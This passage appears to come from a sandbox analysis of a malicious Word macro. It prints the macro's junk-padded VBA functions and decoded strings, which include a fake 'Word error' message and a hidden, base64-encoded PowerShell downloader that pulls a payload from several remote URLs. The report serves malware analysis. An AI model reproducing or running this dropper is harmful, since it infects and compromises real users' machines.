AGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApACsAKAAoACcAKABxACcAKQApACsAKAAoACcAcQAnACsAJwApACgAcwAyACkAJwApACkAKwAoACgAJwAoAGgAJwArACcAYgAnACkAKQArACgAJwBwAHIAaQB2AGkAbABlACcAKwAnAGcAJwApACsAKAAnAGUAJwArACcAZAAuACcAKQArACgAKAAnAGMAbwAnACsAJwBtAHEAcQApACgAcwAyACkAJwArACcAKABjAGcAJwArACcAaQAtAGIAaQBuACcAKwAnAHEAJwApACkAKwAoACgAJwBxACkAKAAnACsAJwBzADIAKQAnACkAKQArACgAKAAnACgAawBjAGcAJwArACcAZwBGAHEAcQAnACkAKQArACgAKAAnACkAJwArACcAKABzADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6ACcAKwAnAHEAcQApACcAKQArACcAKAAnACsAKAAoACcAcwAyACkAKAAnACsAJwBxACcAKQApACsAKAAoACcAcQApACgAJwArACcAcwAyACkAKAAnACsAJwBsACcAKwAnAG8AYwAnACkAKQArACcAYQBsACcAKwAnAGEAZgAnACsAKAAnAGYAbwAnACsAJwByAGQAYQBiACcAKwAnAGwAJwArACcAZQByACcAKQArACgAJwBvAG8AZgAnACsAJwBlACcAKQArACcAcgAuACcAKwAnAGMAbwAnACsAKAAoACcAbQBxACcAKwAnAHEAKQAoAHMAMgAnACsAJwApACcAKQApACsAJwAoACcAKwAoACcAcgAnACsAJwBhAGwAJwApACsAJwBwAGgAJwArACcAcwAtACcAKwAnAHIAJwArACgAJwBlACcAKwAnAGMAZQAnACkAKwAoACgAJwBpAHAAdAAtAGYAMgB1AGgAJwArACcAZgBxAHEAJwArACcAKQAoACcAKQApACsAJwBzADIAJwArACgAKAAnACkAJwArACcAKABxACcAKQApACsAJwBUACcAKwAoACcAVAAnACsAJwA1AEQAQwAnACkAKwAnAHEAcQAnACsAJwApACcAKwAoACgA,,) -> 0 Gge416y0ol9ajq Z2vzndsnblr9xje7s executed
314	Goto pUmEYEJA
315	Dim eRlMmLKx as String
316	Open "YeeTCIHp.dBrFLg.qZpkDJ" For Binary As 209	Open
317	Open "ghtMtA.YUxUI.QTlVpGJg" For Binary As 209	Open
318	Open "jevGKBz.ZpfmEFvDM.fkIcAGBII" For Binary As 209	Open
319	Put # 209, , eRlMmLKx
320	Close # 209
320	pUmEYEJA:
322	Goto CUZigB
323	Dim rJseFDK as String
324	Open "qDBKOE.hcDCJ.BVRxGIBBJ" For Binary As 207	Open
325	Open "ENMCE.LcqmMLm.kcwYHCV" For Binary As 207	Open
326	Open "UaWqrCaA.UYSnZCG.urBVH" For Binary As 207	Open
327	Put # 207, , rJseFDK
328	Close # 207
328	CUZigB:
330	Goto XonQB
331	Dim TOMwIrgJ as String
332	Open "ohhFBJjA.uWdjpFFGk.FVdrHAB" For Binary As 189	Open
333	Open "OEqrJ.wqhoDAHQ.xAflFS" For Binary As 189	Open
334	Open "YWibCdgEJ.NDhrE.WdBFBFE" For Binary As 189	Open
335	Put # 189, , TOMwIrgJ
336	Close # 189
336	XonQB:
338	Goto rKyfgFyfq
339	Dim cztpFp as String
340	Open "ajyVJ.ohKLAGtFI.fshBTGEF" For Binary As 138	Open
341	Open "imfriCGFb.tYNKga.WYPiZwEHH" For Binary As 138	Open
342	Open "KuhBGApcv.ojBZUIIEX.HJefxELF" For Binary As 138	Open
343	Put # 138, , cztpFp
344	Close # 138
344	rKyfgFyfq:
346	Goto kvkwNE
347	Dim ugNdBHTqJ as String
348	Open "aRotQ.FHGaEABuI.JNHZBdF" For Binary As 202	Open
349	Open "uMBDk.VxvrDae.NYTTAIAe" For Binary As 202	Open
350	Open "VWYJvN.lGHiEC.AlsbD" For Binary As 202	Open
351	Put # 202, , ugNdBHTqJ
352	Close # 202
352	kvkwNE:
354	Goto UaqRCIH
355	Dim bgosIAI as String
356	Open "rFDaOyDH.hZniGGDBp.fHUVY" For Binary As 134	Open
357	Open "KrSuJCFF.aeIBC.hRLXIc" For Binary As 134	Open
358	Open "PuNKnKt.sBhbCCuE.ikMJIZFm" For Binary As 134	Open
359	Put # 134, , bgosIAI
360	Close # 134
360	UaqRCIH:
362	End Function

Function C0d4mc619_eaiuirzl, APIs: 56, Strings: 36, Number of lines: 102, Relevance: 138.102

APIs	Meta Information
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: Open
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: Open
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: Open
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: Open
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: Open
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: Open
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: Open
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: Open
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: Open
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: Replace
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: W5ya1q1z48ltq3z_
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: Open
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: Open
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: Open
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: Open
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: Open
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: Open
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: Open
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: Open
Part of subcall function S619csvpd1v4xzk5kc@Dwztpwkmgv8q9o28r: Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open
Open

Strings	Decrypted Strings
"GjkaJIH.peZmtHtGM.gypgP"
"YBkxHBECF.YlsyXD.WgzGtH"
"FbjEBIGb.HVqybIN.uhHkRpG"
"fYqreeAI.UbBaCOpIW.ibhMgA"
"yycyIZBxI.LLMLGP.MSuNHDBEY"
"NxkCf.PoyHSN.naAFIEIY"
"klmCEx.LHwvHEV.nvbNG"
"xlsUIHJ.HlAbuCnVB.fhPbXCDLR"
"bpgkEyAEz.XZZWFRiW.DWsAgQ"
"XcQyeAFEH.OxwUTAF.OjTNwA"
"QEkjG.mlBEHrAJ.IdkPDI"
"INzOLEyBR.lEZxQ.rjitI"
"uxKEC.pIZoJF.srBaREc"
"BOoAgEz.NoSsFEBBB.RueFu"
"tPaIGWt.sNypwJ.uiODJJJA"
"YJiQHG.tumcISEI.XTUZB"
"QQMFr.jWYtE.SdCsJ"
"PVgOlGBl.pUbOHFCY.MgaMJSI"
"FVMJB.OanJEHHDG.BFKlGjECA"
"cDYsKH.cikTAY.Ezyuc"
"uIxkJo.MWxKvDHC.vvgQEXJDH"
"jbKPlXCDh.siqMFp.byKaIAlXB"
"ooZqmESHe.BQQQEBd.iaBAnAZ"
"SgKEFsHED.atIRE.nAXgHCyr"
"stscCEAUT.PziCFDmD.xEGKXRGTE"
"fzpZGsD.rsWZI.nhqNVH"
"MxRtxH.yGeKFDG.nRzlA"
"eAdUlJHj.rMYTRAF.IMwLCCCT"
"gaJjDP.jqoPjEzCA.sqvbMGBp"
"kwgqDdCZ.UJhzPcBmS.DIZSAkBG"
"DySslFhhA.wiGJV.ChxbEmyAk"
"NMdOHH.BANiFHPHQ.VGJSDA"
"KtidJsSE.paErC.KUloBYBF"
"VmdtNNT.mylsHGACs.cOGFA"
"vPtDJGH.uqPgaLD.WNoez"
"dOeICmG.rNLBfGjIw.auFLHQY"

Line	Instruction	Meta Information
363	Function C0d4mc619_eaiuirzl(Hcmfukntlsj04fj5x3)
364	On Error Resume Next	executed
365	Goto oheeCHI
366	Dim iVJGnsW as String
367	Open "GjkaJIH.peZmtHtGM.gypgP" For Binary As 140	Open
368	Open "YBkxHBECF.YlsyXD.WgzGtH" For Binary As 140	Open
369	Open "FbjEBIGb.HVqybIN.uhHkRpG" For Binary As 140	Open
370	Put # 140, , iVJGnsW
371	Close # 140
371	oheeCHI:
373	Goto yPqfxADJ
374	Dim qTLRXCv as String
375	Open "fYqreeAI.UbBaCOpIW.ibhMgA" For Binary As 207	Open
376	Open "yycyIZBxI.LLMLGP.MSuNHDBEY" For Binary As 207	Open
377	Open "NxkCf.PoyHSN.naAFIEIY" For Binary As 207	Open
378	Put # 207, , qTLRXCv
379	Close # 207
379	yPqfxADJ:
381	Goto bRMAl
382	Dim qpTUMG as String
383	Open "klmCEx.LHwvHEV.nvbNG" For Binary As 210	Open
384	Open "xlsUIHJ.HlAbuCnVB.fhPbXCDLR" For Binary As 210	Open
385	Open "bpgkEyAEz.XZZWFRiW.DWsAgQ" For Binary As 210	Open
386	Put # 210, , qpTUMG
387	Close # 210
387	bRMAl:
389	H4k01s90g3qjf9v7e = (Hcmfukntlsj04fj5x3)
390	Goto TrdMzBDZJ
391	Dim uhqsGuAB as String
392	Open "XcQyeAFEH.OxwUTAF.OjTNwA" For Binary As 178	Open
393	Open "QEkjG.mlBEHrAJ.IdkPDI" For Binary As 178	Open
394	Open "INzOLEyBR.lEZxQ.rjitI" For Binary As 178	Open
395	Put # 178, , uhqsGuAB
396	Close # 178
396	TrdMzBDZJ:
398	Goto loQNDFH
399	Dim RBLslko as String
400	Open "uxKEC.pIZoJF.srBaREc" For Binary As 135	Open
401	Open "BOoAgEz.NoSsFEBBB.RueFu" For Binary As 135	Open
402	Open "tPaIGWt.sNypwJ.uiODJJJA" For Binary As 135	Open
403	Put # 135, , RBLslko
404	Close # 135
404	loQNDFH:
406	Goto RjWVCNKEI
407	Dim XUDHDiKId as String
408	Open "YJiQHG.tumcISEI.XTUZB" For Binary As 141	Open
409	Open "QQMFr.jWYtE.SdCsJ" For Binary As 141	Open
410	Open "PVgOlGBl.pUbOHFCY.MgaMJSI" For Binary As 141	Open
411	Put # 141, , XUDHDiKId
412	Close # 141
412	RjWVCNKEI:
414	Ixl3ey6k7oiq4qmw8 = S619csvpd1v4xzk5kc(H4k01s90g3qjf9v7e)
415	Goto nMdUMleFB
416	Dim SLJdkBII as String
417	Open "FVMJB.OanJEHHDG.BFKlGjECA" For Binary As 163	Open
418	Open "cDYsKH.cikTAY.Ezyuc" For Binary As 163	Open
419	Open "uIxkJo.MWxKvDHC.vvgQEXJDH" For Binary As 163	Open
420	Put # 163, , SLJdkBII
421	Close # 163
421	nMdUMleFB:
423	Goto mdgvjEeAC
424	Dim LbhGD as String
425	Open "jbKPlXCDh.siqMFp.byKaIAlXB" For Binary As 192	Open
426	Open "ooZqmESHe.BQQQEBd.iaBAnAZ" For Binary As 192	Open
427	Open "SgKEFsHED.atIRE.nAXgHCyr" For Binary As 192	Open
428	Put # 192, , LbhGD
429	Close # 192
429	mdgvjEeAC:
431	Goto ojGsFHEEF
432	Dim IkDkKCv as String
433	Open "stscCEAUT.PziCFDmD.xEGKXRGTE" For Binary As 106	Open
434	Open "fzpZGsD.rsWZI.nhqNVH" For Binary As 106	Open
435	Open "MxRtxH.yGeKFDG.nRzlA" For Binary As 106	Open
436	Put # 106, , IkDkKCv
437	Close # 106
437	ojGsFHEEF:
439	C0d4mc619_eaiuirzl = Ixl3ey6k7oiq4qmw8
440	Goto aeMpCH
441	Dim ClyWRG as String
442	Open "eAdUlJHj.rMYTRAF.IMwLCCCT" For Binary As 170	Open
443	Open "gaJjDP.jqoPjEzCA.sqvbMGBp" For Binary As 170	Open
444	Open "kwgqDdCZ.UJhzPcBmS.DIZSAkBG" For Binary As 170	Open
445	Put # 170, , ClyWRG
446	Close # 170
446	aeMpCH:
448	Goto BHZQG
449	Dim HvnISHlCE as String
450	Open "DySslFhhA.wiGJV.ChxbEmyAk" For Binary As 205	Open
451	Open "NMdOHH.BANiFHPHQ.VGJSDA" For Binary As 205	Open
452	Open "KtidJsSE.paErC.KUloBYBF" For Binary As 205	Open
453	Put # 205, , HvnISHlCE
454	Close # 205
454	BHZQG:
456	Goto vApdD
457	Dim vuEJPy as String
458	Open "VmdtNNT.mylsHGACs.cOGFA" For Binary As 167	Open
459	Open "vPtDJGH.uqPgaLD.WNoez" For Binary As 167	Open
460	Open "dOeICmG.rNLBfGjIw.auFLHQY" For Binary As 167	Open
461	Put # 167, , vuEJPy
462	Close # 167
462	vApdD:
464	End Function

Function S619csvpd1v4xzk5kc, APIs: 20, Strings: 19, Number of lines: 52, Relevance: 73.552

APIs	Meta Information
Open
Open
Open
Open
Open
Open
Open
Open
Open
Replace	Replace("wqq)(s2)(inqq)(s2)(mqq)(s2)(gmqq)(s2)(tqq)(s2)(qq)(s2)(Sqq)(s2)(:wqq)(s2)(qq)(s2)(inqq)(s2)(3qq)(s2)(2qq)(s2)(_qq)(s2)(qq)(s2)(pqq)(s2)(qq)(s2)(roqq)(s2)(qq)(s2)(ceqq)(s2)(sqq)(s2)(sqq)(s2)(qq)(s2)(","qq)(s2)(",) -> winmgmtS:win32_process Replace("qq)(s2)(qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(cqq)(s2)(mqq)(s2)(dqq)(s2)( qq)(s2)(/qq)(s2)(cqq)(s2)( qq)(s2)(mqq)(s2)(sqq)(s2)(gqq)(s2)( qq)(s2)(%qq)(s2)(uqq)(s2)(sqq)(s2)(eqq)(s2)(rqq)(s2)(nqq)(s2)(aqq)(s2)(mqq)(s2)(eqq)(s2)(%qq)(s2)( qq)(s2)(/qq)(s2)(vqq)(s2)( qq)(s2)(Wqq)(s2)(oqq)(s2)(rqq)(s2)(dqq)(s2)( qq)(s2)(eqq)(s2)(xqq)(s2)(pqq)(s2)(eqq)(s2)(rqq)(s2)(iqq)(s2)(eqq)(s2)(nqq)(s2)(cqq)(s2)(eqq)(s2)(dqq)(s2)( qq)(s2)(aqq)(s2)(nqq)(s2)( qq)(s2)(eqq)(s2)(rqq)(s2)(rqq)(s2)(oqq)(s2)(rqq)(s2)( qq)(s2)(tqq)(s2)(rqq)(s2)(yqq)(s2)(iqq)(s2)(nqq)(s2)(gqq)(s2)( qq)(s2)(tqq)(s2)(oqq)(s2)( qq)(s2)(oqq)(s2)(pqq)(s2)(eqq)(s2)(nqq)(s2)( qq)(s2)(tqq)(s2)(hqq)(s2)(eqq)(s2)( qq)(s2)(fqq)(s2)(iqq)(s2)(lqq)(s2)(eqq)(s2)(.qq)(s2)( qq)(s2)(&qq)(s2)( qq)(s2)( qq)(s2)(Pqq)(s2)(Oqq)(s2)(wqq)(s2)(eqq)(s2)(rqq)(s2)(sqq)(s2)(hqq)(s2)(eqq)(s2)(Lqq)(s2)(Lqq)(s2)( qq)(s2)(-qq)(s2)(wqq)(s2)( qq)(s2)(hqq)(s2)(iqq)(s2)(dqq)(s2)(dqq)(s2)(eqq)(s2)(nqq)(s2)( qq)(s2)(-qq)(s2)(Eqq)(s2)(Nqq)(s2)(Cqq)(s2)(Oqq)(s2)(Dqq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( qq)(s2)( IAqq)(s2)(Agqq)(s2)(ACqq)(s2)(QAqq)(s2)(aQqq)(s2)(Bvqq)(s2)(AHqq)(s2)(gAqq)(s2)(Swqq)(s2)(B5qq)(s2)(ADqq)(s2)(IAqq)(s2)(IAqq)(s2)(A9qq)(s2)(ACqq)(s2)(AAqq)(s2)(Wwqq)(s2)(B0qq)(s2)(AFqq)(s2)(kAqq)(s2)(UAqq)(s2)(BFqq)(s2)(AFqq)(s2)(0Aqq)(s2)(KAqq)(s2)(Aiqq)(s2)(AHqq)(s2)(sAqq)(s2)(Mgqq)(s2)(B9qq)(s2)(AHqq)(s2)(sAqq)(s2)(MAqq)(s2)(B9qq)(s2)(AHqq)(s2)(sAqq)(s2)(Mwqq)(s2)(B9qq)(s2)(AHqq)(s2)(sAqq)(s2)(MQqq)(s2)(B9qq)(s2)(ACqq)(s2)(IAqq)(s2)(LQqq)(s2)(Bmqq)(s2)(ACqq)(s2)(cAqq)(s2)(cwqq)(s2)(BUqq)(s2)(AEqq)(s2)(UAqq)(s2)(bQqq)(s2)(Auqq)(s2)(AGqq)(s2)(kAqq)(s2)(Twqq)(s2)(Auqq)(s2)(AGqq)(s2)(QAqq)(s2)(aQqq)(s2)(BSqq)(s2)(AGqq)(s2)(UAqq)(s2)(Ywqq)(s2)(BUqq)(s2)(ACqq)(s2)(cAqq)(s2)(LAqq)(s2)(Anqq)(s2)(AHqq)(s2)(kAqq)(s2)(Jwqq)(s2)(Asqq)(s2)(ACqq)(s2)(cAqq)(s2)(Uwqq)(s2)(B5qq)(s2)(ACqq)(s2)(cAqq)(s2)(LAqq)(s2)(Anqq)(s2)(AEqq)(s2)(8Aqq)(s2)(cgqq)(s2)(Anqq)(s2)(ACqq)(s2)(kAqq)(s2)(IAqq)(s2)(A7qq)(s2)(ACqq)(s2)(AAqq)(s2)(cwqq)(s2)(BFqq)(s2)(AHqq)(s2)(QAqq)(s2)(LQqq)(s2)(BJqq)(s2)(AHqq)(s2)(QAqq)(s2)(ZQqq)(s2)(BNqq)(s2)(ACqq)(s2)(AAqq)(s2)(IAqq)(s2)(B2qq)(s2)(AGqq)(s2)(EAqq)(s2)(Ugqq)(s2)(Bpqq)(s2)(AGqq)(s2)(EAqq)(s2)(Ygqq)(s2)(BMqq)(s2)(AGqq)(s2)(UAqq)(s2)(Ogqq)(s2)(Axqq)(s2)(ADqq)(s2)(YAqq)(s2)(Vgqq)(s2)(BKqq)(s2)(ACqq)(s2)(AAqq)(s2)(IAqq)(s2)(Aoqq)(s2)(AFqq)(s2)(sAqq)(s2)(dAqq)(s2)(BZqq)(s2)(AFqq)(s2)(AAqq)(s2)(ZQqq)(s2)(Bdqq)(s2)(ACqq)(s2)(gAqq)(s2)(Igqq)(s2)(B7qq)(s2)(ADqq)(s2)(YAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(cAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(MAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(UAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(AAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(IAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(QAqq)(s2)(fQqq)(s2)(B7qq)(s2)(ADqq)(s2)(EAqq)(s2)(fQqq)(s2)(Aiqq)(s2)(ACqq)(s2)(AAqq)(s2)(LQqq)(s2)(BGqq)(s2)(ACqq)(s2)(cAqq)(s2)(Vgqq)(s2)(Anqq)(s2)(ACqq)(s2)(wAqq)(s2)(Jwqq)(s2)(Byqq)(s2)(ACqq)(s2)(cAqq)(s2)(LAqq)(s2)(Anqq)(s2)(AEqq)(s2)(kAqq)(s2)(Ywqq)(s2)(BFqq)(s2)(AFqq)(s2)(AAqq)(s2)(bwqq)(s2)(Bpqq)(s2)(AEqq)(s2)(4Aqq)(s2)(Jwqq)(s2)(Asqq)(s2)(ACqq)(s2)(cAqq)(s2)(Tgqq)(s2)(Blqq)(s2)(AFqq)(s2)(QAqq)(s2)(Lgqq)(s2)(BTqq)(s2)(ACqq)(s2)(cAqq)(s2)(LAqq)(s2)(Anqq)(s2)(AFqq)(s2)(QAqq)(s2)(bQqq)(s2)(Bhqq)(s2)(AEqq)(s2)(4Aqq)(s2)(YQqq)(s2)(BHqq)(s2)(AEqq)(s2)(UAqq)(s2)(Jwqq)(s2)(Asqq)(s2)(ACqq)(s2)(cAqq)(s2)(ZQqq)(s2)(BSqq)(s2)(ACqq)(s2)(cAqq)(s2)(LAqq)(s2)(Anqq)(s2)(AHqq)(s2)(MAqq)(s2)(WQqq)(s2)(BTqq)(s2)(ACqq)(s2)(cAqq)(s2)(LAqq)(s2)(Anqq)(s2)(AHqq)(s2)(QAqq)(s2)(ZQqq)(s2)(Btqq)(s2)(ACqq)(s2)(4Aqq)(s2)(Jwqq)(s2)(Apqq)(s2)(ACqq)(s2)(AAqq)(s2)(KQqq)(s2)(A7qq)(s2)(ACqq)(s2)(QAqq)(s2)(Swqq)(s2)(B0qq)(s2)(ADqq)(s2)(MAqq)(s2)(cwqq)(s2)(Biqq)(s2)(AGqq)(s2)(8Aqq)(s2)(Zwqq)(s2)(A9qq)(s2)(ACqq)(s2)(gAqq)(s2)(Jwqq)(s2)(BCqq)(s2)(ACqq)(s2)(cAqq)(s2)(Kwqq)(s2)(Aoqq)(s2)(ACqq)(s2)(cAqq)(s2)(bQqq)(s2)(Anqq)(s2)(ACqq)(s2)(sAqq)(s2)(Jwqq)(s2)(B2qq)(s2)(ACqq)(s2)(cAqq)(s2)(Kwqq)(s2)(Anqq)(s2)(AGqq)(s2)(sAqq)(s2)(awqq)(s2)(A5qq)(s2)(AHqq)(s2)(IA,"qq)(s2)(",) -> cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKwAnAGMAJwApACwAWwBjAEgAQQBSAF0AOQAyACkAKQA7ACQATQBsADIAOQA0ADYAOQA9ACgAJwBSACcAKwAoACcANgBqACcAKwAnAGsAdQB2AGUAJwApACkAOwAgACAAKAAgACAAVgBBAFIAaQBBAGIATABlACAAMQA2AHYAagAgACAALQB2AEEATABVAEUAbwBuACAAKQA6ADoAIgBzAEUAQwBgAFUAcgBpAHQAeQBwAGAAUgBvAFQAbwBgAGMAbwBMACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABOAGkAbQBoAF8AdQB4AD0AKAAnAEgAZQAnACsAJwB6ACcAKwAoACcAZgB1ACcAKwAnADIAOQAnACkAKQA7ACQATQBlAG0AMAB1AHcAcgAgAD0AIAAoACcATAB5ACcAKwAoACcAZQB0ACcAKwAnAGEANgAnACkAKwAnAHUAZAAnACkAOwAkAEYAagBfAGkAbgB4AGkAPQAoACgAJwBWAHYAJwArACcAMwAnACkAKwAoACcAagBlAGcAJwArACcAOAAnACkAKQA7ACQARwB5AHoAZgA0AGcAOAA9ACgAKAAnAFEANQAnACsAJwA3AHEAdwAnACkAKwAnAGsAJwArACcAegAnACkAOwAkAEMAMAB3ADcAcgBvADYAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBPAF8AdwBnAHEAdgAnACsAJwA3ACcAKwAnAHsAMAAnACsAJwB9ACcAKwAnAEMAJwArACcAMAAzADEANgBlAG0AewAwAH0AJwApACAALQBmACAAWwBDAGgAQQByAF0AOQAyACkAKwAkAE0AZQBtADAAdQB3AHIAKwAoACgAJwAuAGQAJwArACcAbAAnACkAKwAnAGwAJwApADsAJABHAGIAMwBsAHkAawA4AD0AKAAoACcATQB4ACcAKwAnADEAZwAnACkAKwAoACcAZwAnACsAJwBvAG0AJwApACkAOwAkAFIAcAA1ADYAegByAGEAPQBOAEUAVwBgAC0ATwBiAGAASgBlAEMAdAAgAE4AZQBUAC4AVwBFAGIAQwBMAGkARQBuAHQAOwAkAEMAagA1AGsAdwBuAG0APQAoACgAKAAoACcAaAB0AHQAcAA6AHEAcQApACcAKwAnACgAcwAyACcAKwAnACkAKABxAHEAJwArACcAKQAnACkAKQArACcAKAAnACsAKAAoACcAcwAyACcAKwAnACkAKAB6AGUAbgAnACsAJwBpACcAKQApACsAKAAnAHQAaABjACcAKwAnAGEAbQBwAHUAJwArACcAcwAuAGMAJwApACsAKAAoACcAbwAnACsAJwBtAHEAcQApACgAcwAyACcAKwAnACkAJwArACcAKABsAHEAJwArACcAcQApACcAKQApACsAKAAoACcAKABzACcAKQApACsAJwAyACcAKwAoACgAJwApACcAKwAnACgAeQBRACcAKwAnAHEAcQApACgAJwApACkAKwAoACgAJwBzACcAKwAnADIAKQAnACkAKQArACgAJwAoAEAAaAB0AHQAJwArACcAcAAnACsAJwA6AHEAJwArACcAcQAnACsAJwApACgAcwAyACkAJwApAC